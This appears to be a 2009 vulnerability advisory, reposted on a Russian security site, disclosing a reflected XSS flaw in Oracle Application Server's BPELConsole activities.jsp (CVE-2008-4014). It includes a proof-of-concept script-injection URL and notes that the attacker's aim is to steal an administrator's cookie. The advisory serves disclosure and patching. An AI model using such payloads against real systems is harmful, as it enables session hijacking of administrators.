Информационная безопасность
[RU] switch to English


Дополнительная информация

  Многочисленные уязвимости безопасности в продуктах Oracle

  Hacktics Advisory Dec09: Oracle eBusiness Suite - Multiple Vulnerabilities Allow Remote Takeover

  Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.
ODCITABLESTART

  Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter)

  Oracle Application Server Portal 10g Cross Site Scripting  Vulnerability

From:Alexandr Polyakov <alexandr.polyakov_(at)_dsec.ru>
Date:16 января 2009 г.
Subject:Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001


Digital Security Research Group [DSecRG] Advisory    #DSECRG-09-001



Application:                    Oracle Application Server (SOA)
Versions Affected:              Oracle Application Server (SOA) version
10.1.3.1.0  
Vendor URL:                     http://www.oracle.com
Bugs:                           XSS
Exploits:                       YES
Reported:                       10.01.2008
Vendor response:                11.01.2008
Date of Public Advisory:        13.01.2009
CVE:                            CVE-2008-4014
Description:                    XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP
Author:                         Alexandr Polyakov
                               Digital Security Reasearch Group [DSecRG]
(research [at] dsec [dot] ru)


Description
***********

Linked XSS vulnerability found in  BPEL module of Oracle Application Server
(Oracle SOA Suite).  



Details
*******


Linked XSS vulnerability found in  BPEL module. In page
BPELConsole/default/activities.jsp   attacker can inject XSS by appending it to
URL




Example
*******


http://[localhost]:8888/BPELConsole/default/activities.
jsp?'><script>alert('DSEC_XSS')</script>=DSecR
G



Attacker must send injected link to administrator and get adminiatrators cookie.


Code with injected XSS:

----------------------------------------------------------------

</th>
                   <th id="activityLabel" class="ListHeader" align="left"
nowrap>
                   <a
href='activities.
jsp?'><script>alert('DSecRG_XSS')</script>=DSe
cRG&orderBy=label'
class=HeaderLink>
                       Activity Label
                   </a>
                   </th>

---------------------------------------------------------------------------


Fix Information
***************

Information was published in CPU January 2009.
All customers can download CPU petches following instructions from:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan200
9.html




Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in
CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan200
9.html





About
*****

Digital Security is leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and
database security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact:        research [at] dsec [dot] ru
               http://www.dsecrg.ru
               http://www.dsec.ru





О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород